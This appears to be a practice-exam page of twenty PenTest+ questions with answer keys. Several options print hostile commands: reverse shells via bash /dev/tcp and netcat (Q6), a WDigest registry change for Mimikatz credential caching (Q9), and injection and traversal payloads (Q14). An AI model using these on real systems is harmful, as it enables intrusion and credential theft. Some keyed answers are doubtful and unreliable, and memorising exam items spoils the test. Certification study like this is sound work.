Free PT0-001 Sample Questions — CompTIA PenTest+ Certification Exam

Free PT0-001 sample questions for the CompTIA PenTest+ certification exam. No account required; study at your own pace.

Question 1

After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker's own fingerprint, without any exploitation. Which of the following is the MOST likely explanation of what happened?

  • A. The biometric device is tuned more toward false positives
  • B. The biometric device is configured more toward true negatives
  • C. The biometric device is set to fail closed
  • D. The biometric device duplicated a valid user's fingerprint
Correct Answer: A. The biometric device is tuned more toward false positives

Question 2

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

  • A. Transition the application to another port
  • B. Filter port 443 to specific IP addresses
  • C. Implement a web application firewall
  • D. Disable unneeded services
Correct Answer: D. Disable unneeded services

Question 3

The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following Nmap options BEST supports stealthy scanning?

  • A. --min-rate
  • B. --max-length
  • C. --host-timeout
  • D. --max-rate
Correct Answer: D. --max-rate

Question 4

A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?

  • A. The latest vulnerability scan results
  • B. A list of sample application requests
  • C. An up-to-date list of possible exploits
  • D. A list of sample test accounts
Correct Answer: B. A list of sample application requests

Question 5

A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?

  • A. Run the application through a dynamic code analyzer
  • B. Employ a fuzzing utility
  • C. Decompile the application
  • D. Check memory allocations
Correct Answer: C. Decompile the application

Question 6

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

  • A. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
  • B. ssh superadmin@<DESTINATIONIP> -p 443
  • C. nc -e /bin/sh <SOURCEIP> 443
  • D. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1
Correct Answer: D. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1

Question 7

After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?

  • A. Expand the password length from seven to 14 characters
  • B. Implement password history restrictions
  • C. Configure password filters
  • D. Disable the accounts after five incorrect attempts
  • E. Decrease the password expiration window
Correct Answer: C. Configure password filters

Question 8

A penetration tester runs the following from a compromised system: `python -c 'import pty;pty.spawn("/bin/bash")'`. Which of the following actions is the tester taking?

  • A. Removing the Bash history
  • B. Upgrading the shell
  • C. Creating a sandbox
  • D. Capturing credentials
Correct Answer: B. Upgrading the shell

Question 9

During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz. Which of the following registry changes would allow for credential caching in memory?

  • A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
  • B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
  • C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
  • D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
Correct Answer: D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

Question 10

A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?

  • A. Ensure the scanner can make outbound DNS requests
  • B. Ensure the scanner is configured to perform ARP resolution
  • C. Ensure the scanner is configured to analyze IP hosts
  • D. Ensure the scanner has the proper plug-ins loaded
Correct Answer: A. Ensure the scanner can make outbound DNS requests

Question 11

At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computer names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

  • A. Enumeration of services
  • B. OSINT gathering
  • C. Port scanning
  • D. Social engineering
Correct Answer: B. OSINT gathering

Question 12

When performing compliance-based assessments, which of the following is the MOST important key consideration?

  • A. Additional rate
  • B. Company policy
  • C. Impact tolerance
  • D. Industry type
Correct Answer: D. Industry type

Question 13

A penetration tester reports that an Internet-facing application is only using basic authentication. Which of the following would be the BEST remediation strategy?

  • A. Enable HTTP Strict Transport Security
  • B. Enable a secure cookie flag
  • C. Encrypt the communication channel
  • D. Sanitize invalid user input
Correct Answer: A. Enable HTTP Strict Transport Security

Question 14

A penetration tester has identified a directory traversal vulnerability. Which of the following payloads could have helped the penetration tester identify this vulnerability?

  • A. 'or 'folder' like 'file'; --
  • B. || ls /tmp/
  • C. "><script>document.location=/root/</script>
  • D. && dir C:/
  • E. /../../../../../../../
Correct Answer: E. /../../../../../../../

Question 15

A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of the following is the BEST method for a tester to confirm the vulnerability exists?

  • A. Manually run publicly available exploit code
  • B. Confirm via evidence of the updated version number
  • C. Run the vulnerability scanner again
  • D. Perform dynamic analysis on the vulnerable service
Correct Answer: B. Confirm via evidence of the updated version number

Question 16

A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify?

  • A. Script kiddies
  • B. APT actors
  • C. Insider threats
  • D. Hacktivist groups
Correct Answer: B. APT actors

Question 17

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).

  • A. Cleartext exposure of SNMP trap data
  • B. Software bugs resident in the IT ticketing system
  • C. S/MIME certificate templates defined by the CA
  • D. Health information communicated over HTTP
  • E. DAR encryption on records servers
Correct Answer:
  • D. Health information communicated over HTTP
  • E. DAR encryption on records servers

Question 18

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privileges, from which of the following places is he using Mimikatz to pull credentials?

  • A. LSASS
  • B. SAM database
  • C. Active Directory
  • D. Registry
Correct Answer: A. LSASS

Question 19

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

  • A. Selection of the appropriate set of security testing tools
  • B. Current and load ratings of the ICS components
  • C. Potential operational and safety hazards
  • D. Electrical certification of hardware used in the test
Correct Answer: C. Potential operational and safety hazards

Question 20

A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

  • A. TCP SYN flood
  • B. SQL injection
  • C. XSS
  • D. XMAS scan
Correct Answer: A. TCP SYN flood
